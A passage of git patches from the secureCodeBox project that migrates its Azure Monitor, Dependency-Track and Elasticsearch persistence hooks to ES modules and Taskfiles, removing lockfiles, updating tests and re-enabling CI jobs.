"sha512-bLGGlR1QxBcynn2d5YmDX4MGjlZvy2MRBDRNHLJ8VI6l6+9FUiyTFNJ0IveOSP0bcXgVDPRcfGqA0pjaqUpfVg==", - "dev": true - }, - "slash": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/slash/-/slash-3.0.0.tgz", - "integrity": "sha512-g9Q1haeby36OSStwb4ntCGGGaKsaVSjQ68fBxoQcutl5fS1vuY18H3wSt3jFyFtrkx+Kz0V1G85A4MyAdDMi2Q==", - "dev": true - }, - "source-map": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.6.1.tgz", - "integrity": "sha512-UjgapumWlbMhkBgzT7Ykc5YXUT46F0iKu8SGXq0bcwP5dz/h0Plj6enJqjz1Zbq2l5WaqYnrVbwWOWMyF3F47g==", - "dev": true - }, - "source-map-support": { - "version": "0.5.13", - "resolved": "https://registry.npmjs.org/source-map-support/-/source-map-support-0.5.13.tgz", - "integrity": "sha512-SHSKFHadjVA5oR4PPqhtAVdcBWwRYVd6g6cAXnIbRiIwc2EhPrTuKUBdSLvlEKyIP3GCf89fltvcZiP9MMFA1w==", - "dev": true, - "requires": { - "buffer-from": "^1.0.0", - "source-map": "^0.6.0" - } - }, - "sprintf-js": { - "version": "1.0.3", - "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.0.3.tgz", - "integrity": "sha512-D9cPgkvLlV3t3IzL0D0YLvGA9Ahk4PcvVwUbN0dSGr1aP0Nrt4AEnTUbuGvquEC0mA64Gqt1fzirlRs5ibXx8g==", - "dev": true - }, - "stack-utils": { - "version": "2.0.6", - "resolved": "https://registry.npmjs.org/stack-utils/-/stack-utils-2.0.6.tgz", - "integrity": "sha512-XlkWvfIm6RmsWtNJx+uqtKLS8eqFbxUg0ZzLXqY0caEy9l7hruX8IpiDnjsLavoBgqCCR71TqWO8MaXYheJ3RQ==", - "dev": true, - "requires": { - "escape-string-regexp": "^2.0.0" - } - }, - "string-length": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/string-length/-/string-length-4.0.2.tgz", - "integrity": "sha512-+l6rNN5fYHNhZZy41RXsYptCjA2Igmq4EG7kZAYFQI1E1VTXarr6ZPXBg6eq7Y6eK4FEhY6AJlyuFIb/v/S0VQ==", - "dev": true, - "requires": { - "char-regex": "^1.0.2", - "strip-ansi": "^6.0.0" - } - }, - "string-width": { - "version": "4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", - "dev": true, - "requires": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" - } - }, - "strip-ansi": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "dev": true, - "requires": { - "ansi-regex": "^5.0.1" - } - }, - "strip-bom": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/strip-bom/-/strip-bom-4.0.0.tgz", - "integrity": "sha512-3xurFv5tEgii33Zi8Jtp55wEIILR9eh34FAW00PZf+JnSsTmV/ioewSgQl97JHvgjoRGwPShsWm+IdrxB35d0w==", - "dev": true - }, - "strip-final-newline": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/strip-final-newline/-/strip-final-newline-2.0.0.tgz", - "integrity": "sha512-BrpvfNAE3dcvq7ll3xVumzjKjZQ5tI1sEUIKr3Uoks0XUl45St3FlatVqef9prk4jRDzhW6WZg+3bk93y6pLjA==", - "dev": true - }, - "strip-json-comments": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/strip-json-comments/-/strip-json-comments-3.1.1.tgz", - "integrity": "sha512-6fPc+R4ihwqP6N/aIv2f1gMH8lOVtWQHoqC4yK6oSDVVocumAsfCqjkXnqiYMhmMwS/mEHLp7Vehlt3ql6lEig==", - "dev": true - }, - "supports-color": { - "version": "7.2.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", - "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", - "dev": true, - "requires": { - "has-flag": "^4.0.0" - } - }, - "supports-preserve-symlinks-flag": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", - "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==", - "dev": true - }, - "test-exclude": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/test-exclude/-/test-exclude-6.0.0.tgz", - "integrity": "sha512-cAGWPIyOHU6zlmg88jwm7VRyXnMN7iV68OGAbYDk/Mh/xC/pzVPlQtY6ngoIH/5/tciuhGfvESU8GrHrcxD56w==", - "dev": true, - "requires": { - "@istanbuljs/schema": "^0.1.2", - "glob": "^7.1.4", - "minimatch": "^3.0.4" - } - }, - "tmpl": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/tmpl/-/tmpl-1.0.5.tgz", - "integrity": "sha512-3f0uOEAQwIqGuWW2MVzYg8fV/QNnc/IpuJNG837rLuczAaLVHslWHZQj4IGiEl5Hs3kkbhwL9Ab7Hrsmuj+Smw==", - "dev": true - }, - "to-fast-properties": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/to-fast-properties/-/to-fast-properties-2.0.0.tgz", - "integrity": "sha512-/OaKK0xYrs3DmxRYqL/yDc+FxFUVYhDlXMhRmv3z915w2HF1tnN1omB354j8VUGO/hbRzyD6Y3sA7v7GS/ceog==", - "dev": true - }, - "to-regex-range": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/to-regex-range/-/to-regex-range-5.0.1.tgz", - "integrity": "sha512-65P7iz6X5yEr1cwcgvQxbbIw7Uk3gOy5dIdtZ4rDveLqhrdJP+Li/Hx6tyK0NEb+2GCyneCMJiGqrADCSNk8sQ==", - "dev": true, - "requires": { - "is-number": "^7.0.0" - } - }, - "type-detect": { - "version": "4.0.8", - "resolved": "https://registry.npmjs.org/type-detect/-/type-detect-4.0.8.tgz", - "integrity": "sha512-0fr/mIH1dlO+x7TlcMy+bIDqKPsw/70tVyeHW787goQjhmqaZe10uwLujubK9q9Lg6Fiho1KUKDYz0Z7k7g5/g==", - "dev": true - }, - "type-fest": { - "version": "0.21.3", - "resolved": "https://registry.npmjs.org/type-fest/-/type-fest-0.21.3.tgz", - "integrity": "sha512-t0rzBq87m3fVcduHDUFhKmyyX+9eo6WQjZvf51Ea/M0Q7+T374Jp1aUiyUl0GKxp8M/OETVHSDvmkyPgvX+X2w==", - "dev": true - }, - "update-browserslist-db": { - "version": "1.0.10", - "resolved": "https://registry.npmjs.org/update-browserslist-db/-/update-browserslist-db-1.0.10.tgz", - "integrity": "sha512-OztqDenkfFkbSG+tRxBeAnCVPckDBcvibKd35yDONx6OU8N7sqgwc7rCbkJ/WcYtVRZ4ba68d6byhC21GFh7sQ==", - "dev": true, - "requires": { - "escalade": "^3.1.1", - "picocolors": "^1.0.0" - } - }, - "v8-to-istanbul": { - "version": "9.0.1", - "resolved": "https://registry.npmjs.org/v8-to-istanbul/-/v8-to-istanbul-9.0.1.tgz", - "integrity": "sha512-74Y4LqY74kLE6IFyIjPtkSTWzUZmj8tdHT9Ii/26dvQ6K9Dl2NbEfj0XgU2sHCtKgt5VupqhlO/5aWuqS+IY1w==", - "dev": true, - "requires": { - "@jridgewell/trace-mapping": "^0.3.12", - "@types/istanbul-lib-coverage": "^2.0.1", - "convert-source-map": "^1.6.0" - }, - "dependencies": { - "convert-source-map": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-1.9.0.tgz", - "integrity": "sha512-ASFBup0Mz1uyiIjANan1jzLQami9z1PoYSZCiiYW2FczPbenXc45FZdBZLzOT+r6+iciuEModtmCti+hjaAk0A==", - "dev": true - } - } - }, - "walker": { - "version": "1.0.8", - "resolved": "https://registry.npmjs.org/walker/-/walker-1.0.8.tgz", - "integrity": "sha512-ts/8E8l5b7kY0vlWLewOkDXMmPdLcVV4GmOQLyxuSswIJsweeFZtAsMF7k1Nszz+TYBQrlYRmzOnr398y1JemQ==", - "dev": true, - "requires": { - "makeerror": "1.0.12" - } - }, - "which": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/which/-/which-2.0.2.tgz", - "integrity": "sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==", - "dev": true, - "requires": { - "isexe": "^2.0.0" - } - }, - "wrap-ansi": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", - "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", - "dev": true, - "requires": { - "ansi-styles": "^4.0.0", - "string-width": "^4.1.0", - "strip-ansi": "^6.0.0" - } - }, - "wrappy": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", - "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==", - "dev": true - }, - "write-file-atomic": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-5.0.0.tgz", - "integrity": "sha512-R7NYMnHSlV42K54lwY9lvW6MnSm1HSJqZL3xiSgi9E7//FYaI74r2G0rd+/X6VAMkHEdzxQaU5HUOXWUz5kA/w==", - "dev": true, - "requires": { - "imurmurhash": "^0.1.4", - "signal-exit": "^3.0.7" - } - }, - "y18n": { - "version": "5.0.8", - "resolved": "https://registry.npmjs.org/y18n/-/y18n-5.0.8.tgz", - "integrity": "sha512-0pfFzegeDWJHJIAmTLRP2DwHjdF5s7jo9tuztdQxAhINCdvS+3nGINqPd00AphqJR/0LhANUS6/+7SCb98YOfA==", - "dev": true - }, - "yallist": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-3.1.1.tgz", - "integrity": "sha512-a4UGQaWPH59mOXUYnAG2ewncQS4i4F43Tv3JoAM+s2VDAmS9NsK8GpDMLrCHPksFT7h3K6TOoUNn2pb7RoXx4g==", - "dev": true - }, - "yargs": { - "version": "17.6.2", - "resolved": "https://registry.npmjs.org/yargs/-/yargs-17.6.2.tgz", - "integrity": "sha512-1/9UrdHjDZc0eOU0HxOHoS78C69UD3JRMvzlJ7S79S2nTaWRA/whGCTV8o9e/N/1Va9YIV7Q4sOxD8VV4pCWOw==", - "dev": true, - "requires": { - "cliui": "^8.0.1", - "escalade": "^3.1.1", - "get-caller-file": "^2.0.5", - "require-directory": "^2.1.1", - "string-width": "^4.2.3", - "y18n": "^5.0.5", - "yargs-parser": "^21.1.1" - } - }, - "yargs-parser": { - "version": "21.1.1", - "resolved": "https://registry.npmjs.org/yargs-parser/-/yargs-parser-21.1.1.tgz", - "integrity": "sha512-tVpsJW7DdjecAiFpbIB1e3qxIQsE6NoPc5/eTdrbbIC4h0LVsWhnoa3g+m2HclBIujHzsxZ4VJVA+GUuc2/LBw==", - "dev": true - }, - "yocto-queue": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/yocto-queue/-/yocto-queue-0.1.0.tgz", - "integrity": "sha512-rVksvsnNCdJ/ohGc6xgPwyN8eheCxsiLM8mxuE/t/mOVqJewPuO1miLpTHQiRgTKCLexL4MeAFVagts7HmNZ2Q==", - "dev": true - } - } -} diff --git a/hooks/persistence-azure-monitor/hook/package-lock.json.license b/hooks/persistence-azure-monitor/hook/package-lock.json.license deleted file mode 100644 index c95bc37185..0000000000 --- a/hooks/persistence-azure-monitor/hook/package-lock.json.license +++ /dev/null @@ -1,3 +0,0 @@ -SPDX-FileCopyrightText: the secureCodeBox authors - -SPDX-License-Identifier: Apache-2.0 diff --git a/hooks/persistence-azure-monitor/hook/package.json b/hooks/persistence-azure-monitor/hook/package.json deleted file mode 100644 index b2f18479dc..0000000000 --- a/hooks/persistence-azure-monitor/hook/package.json +++ /dev/null @@ -1,42 +0,0 @@ -{ - "name": "@securecodebox/hook-persistence-azure-monitor", - "version": "1.0.0", - "description": "secureCodeBox Hook to persist results to Azure Monitor.", - "homepage": "https://www.secureCodeBox.io", - "type": "module", - "repository": { - "type": "git", - "url": "git+https://github.com/secureCodeBox/secureCodeBox.git" - }, - "main": "hook.js", - "scripts": { - "test": "jest --verbose --ci --colors --coverage --passWithNoTests" - }, - "keywords": [ - "secureCodeBox", - "security", - "hook", - "azure-monitor", - "persistence" - ], - "author": { - "name": "iteratec GmbH", - "email": "securecodebox@iteratec.com", - "url": "https://www.iteratec.com" - }, - "contributors": [ - { - "name": "Max Maass", - "url": "https://github.com/malexmave" - } - ], - "bugs": { - "url": "https://github.com/secureCodeBox/secureCodeBox/issues" - }, - "license": "Apache-2.0", - "dependencies": {}, - "devDependencies": { - "@types/jest": "^29.4.0", - "jest": "^29.3.1" - } -} diff --git a/hooks/persistence-azure-monitor/hook/package.json.license b/hooks/persistence-azure-monitor/hook/package.json.license deleted file mode 100644 index c95bc37185..0000000000 --- a/hooks/persistence-azure-monitor/hook/package.json.license +++ /dev/null @@ -1,3 +0,0 @@ -SPDX-FileCopyrightText: the secureCodeBox authors - -SPDX-License-Identifier: Apache-2.0 From f364cda51a0374be5f2f717f2a74bc91d72f0771 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Thu, 10 Jul 2025 15:52:19 +0200 Subject: [PATCH 111/137] Add taskfile for local defectdojo hook testing Ci remains in a seperate job as it needs to install java (which isn't part of the normal hook matrix --- hooks/persistence-defectdojo/Taskfile.yaml | 16 ++++++++++++++++ 1 file changed, 16 insertions(+) create mode 100644 hooks/persistence-defectdojo/Taskfile.yaml diff --git a/hooks/persistence-defectdojo/Taskfile.yaml b/hooks/persistence-defectdojo/Taskfile.yaml new file mode 100644 index 0000000000..132c0b6387 --- /dev/null +++ b/hooks/persistence-defectdojo/Taskfile.yaml @@ -0,0 +1,16 @@ +version: "3" + +includes: + hook: + taskfile: ../Taskfile.yaml + flatten: true + vars: + hookName: persistence-defectdojo + excludes: + - test:unit + +tasks: + test:unit: + cmds: + - ./gradlew test + dir: hook \ No newline at end of file From 8e6583b9bb459ecf520376bc06957fb77a210778 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Thu, 10 Jul 2025 16:01:02 +0200 Subject: [PATCH 112/137] Update dependency track hook to esm and task --- .github/workflows/ci.yaml | 2 +- .../persistence-dependencytrack/Taskfile.yaml | 8 +++++ .../hook/Dockerfile | 5 ---- .../persistence-dependencytrack/hook/hook.js | 4 +-- .../hook/hook.test.js | 3 +- .../hook/package-lock.json | 13 -------- .../hook/package-lock.json.license | 3 -- .../hook/package.json | 30 ------------------- .../hook/package.json.license | 3 -- 9 files changed, 12 insertions(+), 59 deletions(-) create mode 100644 hooks/persistence-dependencytrack/Taskfile.yaml delete mode 100644 hooks/persistence-dependencytrack/hook/package-lock.json delete mode 100644 hooks/persistence-dependencytrack/hook/package-lock.json.license delete mode 100644 hooks/persistence-dependencytrack/hook/package.json delete mode 100644 hooks/persistence-dependencytrack/hook/package.json.license diff --git a/.github/workflows/ci.yaml b/.github/workflows/ci.yaml index db2b5ec0fc..982ea6e028 100644 --- a/.github/workflows/ci.yaml +++ b/.github/workflows/ci.yaml @@ -577,7 +577,7 @@ jobs: - generic-webhook - persistence-azure-monitor # - persistence-elastic # Fails on the CI due to insufficient cpu as mentioned in issue #1165 - # - persistence-dependencytrack + - persistence-dependencytrack # - update-field-hook - finding-post-processing - notification diff --git a/hooks/persistence-dependencytrack/Taskfile.yaml b/hooks/persistence-dependencytrack/Taskfile.yaml new file mode 100644 index 0000000000..e3bfce49f2 --- /dev/null +++ b/hooks/persistence-dependencytrack/Taskfile.yaml @@ -0,0 +1,8 @@ +version: "3" + +includes: + hook: + taskfile: ../Taskfile.yaml + flatten: true + vars: + hookName: persistence-dependencytrack diff --git a/hooks/persistence-dependencytrack/hook/Dockerfile b/hooks/persistence-dependencytrack/hook/Dockerfile index 11e945113c..0d922dd674 100644 --- a/hooks/persistence-dependencytrack/hook/Dockerfile +++ b/hooks/persistence-dependencytrack/hook/Dockerfile @@ -4,11 +4,6 @@ ARG namespace ARG baseImageTag -FROM node:22-alpine AS build -RUN mkdir -p /home/app -WORKDIR /home/app -COPY package.json package-lock.json ./ -RUN npm ci --omit=dev FROM ${namespace:-securecodebox}/hook-sdk-nodejs:${baseImageTag:-latest} WORKDIR /home/app/hook-wrapper/hook/ diff --git a/hooks/persistence-dependencytrack/hook/hook.js b/hooks/persistence-dependencytrack/hook/hook.js index a826910763..b0974e02f2 100644 --- a/hooks/persistence-dependencytrack/hook/hook.js +++ b/hooks/persistence-dependencytrack/hook/hook.js @@ -2,7 +2,7 @@ // // SPDX-License-Identifier: Apache-2.0 -async function handle({ +export async function handle({ getRawResults, scan, apiKey = process.env["DEPENDENCYTRACK_APIKEY"], @@ -122,5 +122,3 @@ async function handle({ `Successfully uploaded SBOM to Dependency-Track. Response-token to check the status: ${content.token}`, ); } - -module.exports.handle = handle; diff --git a/hooks/persistence-dependencytrack/hook/hook.test.js b/hooks/persistence-dependencytrack/hook/hook.test.js index 7d8cafa197..b9a41bf0ae 100644 --- a/hooks/persistence-dependencytrack/hook/hook.test.js +++ b/hooks/persistence-dependencytrack/hook/hook.test.js @@ -2,7 +2,8 @@ // // SPDX-License-Identifier: Apache-2.0 -const { handle } = require("./hook"); +import { handle } from "./hook"; + const fetch = jest.fn(() => Promise.resolve({ ok: true, diff --git a/hooks/persistence-dependencytrack/hook/package-lock.json b/hooks/persistence-dependencytrack/hook/package-lock.json deleted file mode 100644 index 557a567405..0000000000 --- a/hooks/persistence-dependencytrack/hook/package-lock.json +++ /dev/null @@ -1,13 +0,0 @@ -{ - "name": "@securecodebox/hook-persistence-dependencytrack", - "version": "1.0.0", - "lockfileVersion": 2, - "requires": true, - "packages": { - "": { - "name": "@securecodebox/hook-persistence-dependencytrack", - "version": "1.0.0", - "license": "Apache-2.0" - } - } -} diff --git a/hooks/persistence-dependencytrack/hook/package-lock.json.license b/hooks/persistence-dependencytrack/hook/package-lock.json.license deleted file mode 100644 index c95bc37185..0000000000 --- a/hooks/persistence-dependencytrack/hook/package-lock.json.license +++ /dev/null @@ -1,3 +0,0 @@ -SPDX-FileCopyrightText: the secureCodeBox authors - -SPDX-License-Identifier: Apache-2.0 diff --git a/hooks/persistence-dependencytrack/hook/package.json b/hooks/persistence-dependencytrack/hook/package.json deleted file mode 100644 index b0a7fc4f49..0000000000 --- a/hooks/persistence-dependencytrack/hook/package.json +++ /dev/null @@ -1,30 +0,0 @@ -{ - "name": "@securecodebox/hook-persistence-dependencytrack", - "version": "1.0.0", - "description": "secureCodeBox hook to persist CycloneDX SBOMs to Dependency-Track.", - "homepage": "https://www.secureCodeBox.io", - "repository": { - "type": "git", - "url": "git+https://github.com/secureCodeBox/secureCodeBox.git" - }, - "main": "hook.js", - "scripts": { - "test": "jest --verbose --ci --colors --coverage --passWithNoTests" - }, - "keywords": [ - "secureCodeBox", - "security", - "hook", - "dependencytrack", - "persistence" - ], - "author": { - "name": "iteratec GmbH", - "email": "securecodebox@iteratec.com", - "url": "https://www.iteratec.com" - }, - "bugs": { - "url": "https://github.com/secureCodeBox/secureCodeBox/issues" - }, - "license": "Apache-2.0" -} diff --git a/hooks/persistence-dependencytrack/hook/package.json.license b/hooks/persistence-dependencytrack/hook/package.json.license deleted file mode 100644 index c95bc37185..0000000000 --- a/hooks/persistence-dependencytrack/hook/package.json.license +++ /dev/null @@ -1,3 +0,0 @@ -SPDX-FileCopyrightText: the secureCodeBox authors - -SPDX-License-Identifier: Apache-2.0 From 4528a09d666358f1258f8690f82f0a18c7717692 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Thu, 10 Jul 2025 16:17:56 +0200 Subject: [PATCH 113/137] Migrate persistence elastic to esm & task --- .github/workflows/ci.yaml | 2 +- hooks/persistence-elastic/Taskfile.yaml | 8 + hooks/persistence-elastic/hook/hook.js | 22 +- hooks/persistence-elastic/hook/hook.test.js | 39 +- .../hook/package-lock.json | 7099 +++-------------- hooks/persistence-elastic/hook/package.json | 12 +- 6 files changed, 1000 insertions(+), 6182 deletions(-) create mode 100644 hooks/persistence-elastic/Taskfile.yaml diff --git a/.github/workflows/ci.yaml b/.github/workflows/ci.yaml index 982ea6e028..ab67884ebf 100644 --- a/.github/workflows/ci.yaml +++ b/.github/workflows/ci.yaml @@ -576,7 +576,7 @@ jobs: - cascading-scans - generic-webhook - persistence-azure-monitor - # - persistence-elastic # Fails on the CI due to insufficient cpu as mentioned in issue #1165 + - persistence-elastic - persistence-dependencytrack # - update-field-hook - finding-post-processing diff --git a/hooks/persistence-elastic/Taskfile.yaml b/hooks/persistence-elastic/Taskfile.yaml new file mode 100644 index 0000000000..7cec3312b6 --- /dev/null +++ b/hooks/persistence-elastic/Taskfile.yaml @@ -0,0 +1,8 @@ +version: "3" + +includes: + hook: + taskfile: ../Taskfile.yaml + flatten: true + vars: + hookName: persistence-elastic diff --git a/hooks/persistence-elastic/hook/hook.js b/hooks/persistence-elastic/hook/hook.js index 2001645874..e9ea8077e6 100644 --- a/hooks/persistence-elastic/hook/hook.js +++ b/hooks/persistence-elastic/hook/hook.js @@ -2,12 +2,9 @@ // // SPDX-License-Identifier: Apache-2.0 -const { Client } = require("@elastic/elasticsearch"); - -const flatMap = require("lodash.flatmap"); -const chunk = require("lodash.chunk"); - -const { DateTime } = require("luxon"); +import { Client } from "@elastic/elasticsearch"; +import { flatMap, chunk } from "lodash-es"; +import { DateTime } from "luxon"; const authParams = {}; @@ -36,12 +33,7 @@ if (apiKeyId && apiKey) { ); } -const client = new Client({ - node: process.env["ELASTICSEARCH_ADDRESS"], - ...authParams, -}); - -async function handle({ +export async function handle({ getFindings, scan, now = new Date(), @@ -50,6 +42,10 @@ async function handle({ indexSuffix = process.env["ELASTICSEARCH_INDEX_SUFFIX"] || defaultDateFormat, appendNamespace = process.env["ELASTICSEARCH_INDEX_APPEND_NAMESPACE"] || false, + client = new Client({ + node: process.env["ELASTICSEARCH_ADDRESS"], + ...authParams, + }), }) { const findings = await getFindings(); @@ -117,5 +113,3 @@ async function handle({ } } } -module.exports.elasticClient = client; -module.exports.handle = handle; diff --git a/hooks/persistence-elastic/hook/hook.test.js b/hooks/persistence-elastic/hook/hook.test.js index e94c9a340f..08b5e7b16e 100644 --- a/hooks/persistence-elastic/hook/hook.test.js +++ b/hooks/persistence-elastic/hook/hook.test.js @@ -2,11 +2,18 @@ // // SPDX-License-Identifier: Apache-2.0 -const { handle, elasticClient } = require("./hook"); +import { handle } from "./hook"; + +let elasticClient; beforeEach(() => { - elasticClient.index.mockClear(); - elasticClient.bulk.mockClear(); + elasticClient = { + indices: { + create: jest.fn(), + }, + index: jest.fn(), + bulk: jest.fn(() => ({ body: {} })), + }; }); const scan = { @@ -36,10 +43,11 @@ test("should only send scan summary document if no findings are passing in", asy now: testDate, tenant: "default", appendNamespace: true, + client: elasticClient, }); - expect(elasticClient.index).toBeCalledTimes(1); - expect(elasticClient.index).toBeCalledWith({ + expect(elasticClient.index).toHaveBeenCalledTimes(1); + expect(elasticClient.index).toHaveBeenCalledWith({ body: { "@timestamp": testDate, id: "09988cdf-1fc7-4f85-95ee-1b1d65dbc7cc", @@ -53,7 +61,7 @@ test("should only send scan summary document if no findings are passing in", asy }, index: `scb_default_2020-11-11`, }); - expect(elasticClient.bulk).not.toBeCalled(); + expect(elasticClient.bulk).not.toHaveBeenCalled(); }); test("should send findings to elasticsearch with given prefix", async () => { @@ -74,10 +82,11 @@ test("should send findings to elasticsearch with given prefix", async () => { tenant: "default", indexPrefix: "myPrefix", appendNamespace: true, + client: elasticClient, }); - expect(elasticClient.index).toBeCalledTimes(1); - expect(elasticClient.index).toBeCalledWith({ + expect(elasticClient.index).toHaveBeenCalledTimes(1); + expect(elasticClient.index).toHaveBeenCalledWith({ body: { "@timestamp": testDate, id: "09988cdf-1fc7-4f85-95ee-1b1d65dbc7cc", @@ -92,8 +101,8 @@ test("should send findings to elasticsearch with given prefix", async () => { index: `myPrefix_default_2020-11-11`, }); - expect(elasticClient.bulk).toBeCalledTimes(1); - expect(elasticClient.bulk).toBeCalledWith({ + expect(elasticClient.bulk).toHaveBeenCalledTimes(1); + expect(elasticClient.bulk).toHaveBeenCalledWith({ refresh: true, body: [ { @@ -123,7 +132,13 @@ test("should not append namespace if 'appendNamespace' is null", async () => { const getFindings = async () => findings; - await handle({ getFindings, scan, now: testDate, tenant: "default" }); + await handle({ + getFindings, + scan, + now: testDate, + tenant: "default", + client: elasticClient, + }); expect(elasticClient.index).toBeCalledTimes(1); expect(elasticClient.index).toBeCalledWith({ @@ -153,6 +168,7 @@ test("should append date format yyyy", async () => { now: testDate, tenant: "default", indexSuffix: "yyyy", + client: elasticClient, }); expect(elasticClient.index).toBeCalledTimes(1); @@ -183,6 +199,7 @@ test("should append week format like yyyy/'W'W -> 2020/W46", async () => { now: testDate, tenant: "default", indexSuffix: "yyyy/'W'W", + client: elasticClient, }); expect(elasticClient.index).toBeCalledTimes(1); diff --git a/hooks/persistence-elastic/hook/package-lock.json b/hooks/persistence-elastic/hook/package-lock.json index b8166cd282..e8d449db22 100644 --- a/hooks/persistence-elastic/hook/package-lock.json +++ b/hooks/persistence-elastic/hook/package-lock.json @@ -10,6308 +10,1368 @@ "license": "Apache-2.0", "dependencies": { "@elastic/elasticsearch": "^8.18.2", - "lodash.chunk": "^4.2.0", - "lodash.flatmap": "^4.5.0", - "luxon": "^3.6.1" + "lodash-es": "^4.17.21", + "luxon": "^3.7.1" }, "devDependencies": { - "@types/jest": "^29.4.0", - "jest": "^29.3.1" + "@types/jest": "^30.0.0" } }, - "node_modules/@ampproject/remapping": { - "version": "2.2.1", - "resolved": "https://registry.npmjs.org/@ampproject/remapping/-/remapping-2.2.1.tgz", - "integrity": "sha512-lFMjJTrFL3j7L9yBxwYfCq2k6qqwHyzuUl/XBnif78PWTJYyL/dfowQHWE3sp6U6ZzqWiiIZnpTMO96zhkjwtg==", + "node_modules/@babel/code-frame": { + "version": "7.27.1", + "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.27.1.tgz", + "integrity": "sha512-cjQ7ZlQ0Mv3b47hABuTevyTuYN4i+loJKGeV9flcCgIK37cCXRh+L1bd3iBHlynerhQ7BhCkn2BPbQUL+rGqFg==", "dev": true, + "license": "MIT", "dependencies": { - "@jridgewell/gen-mapping": "^0.3.0", - "@jridgewell/trace-mapping": "^0.3.9" + "@babel/helper-validator-identifier": "^7.27.1", + "js-tokens": "^4.0.0", + "picocolors": "^1.1.1" }, "engines": { - "node": ">=6.0.0" + "node": ">=6.9.0" } }, - "node_modules/@babel/code-frame": { - "version": "7.22.13", - "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.22.13.tgz", - "integrity": "sha512-XktuhWlJ5g+3TJXc5upd9Ks1HutSArik6jf2eAjYFyIOf4ej3RN+184cZbzDvbPnuTJIUhPKKJE3cIsYTiAT3w==", + "node_modules/@babel/helper-validator-identifier": { + "version": "7.27.1", + "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.27.1.tgz", + "integrity": "sha512-D2hP9eA+Sqx1kBZgzxZh0y1trbuU+JoDkiEwqhQ36nodYqJwyEIhPSdMNd7lOm/4io72luTPWH20Yda0xOuUow==", "dev": true, - "dependencies": { - "@babel/highlight": "^7.22.13", - "chalk": "^2.4.2" - }, + "license": "MIT", "engines": { "node": ">=6.9.0" } }, - "node_modules/@babel/code-frame/node_modules/ansi-styles": { - "version": "3.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-3.2.1.tgz", - "integrity": "sha512-VT0ZI6kZRdTh8YyJw3SMbYm/u+NqfsAxEpWO0Pf9sq8/e94WxxOpPKx9FR1FlyCtOVDNOQ+8ntlqFxiRc+r5qA==", - "dev": true, + "node_modules/@elastic/elasticsearch": { + "version": "8.18.2", + "resolved": "https://registry.npmjs.org/@elastic/elasticsearch/-/elasticsearch-8.18.2.tgz", + "integrity": "sha512-2pOc/hGdxkbaDavfAlnUfjJdVsFRCGqg7fpsWJfJ2UzpgViIyojdViHg8zOCT1J14lAwvDgb9CNETWa3SBZRfw==", + "license": "Apache-2.0", "dependencies": { - "color-convert": "^1.9.0" + "@elastic/transport": "^8.9.6", + "apache-arrow": "18.x - 19.x", + "tslib": "^2.4.0" }, "engines": { - "node": ">=4" + "node": ">=18" } }, - "node_modules/@babel/code-frame/node_modules/chalk": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-2.4.2.tgz", - "integrity": "sha512-Mti+f9lpJNcwF4tWV8/OrTTtF1gZi+f8FqlyAdouralcFWFQWF2+NgCHShjkCb+IFBLq9buZwE1xckQU4peSuQ==", - 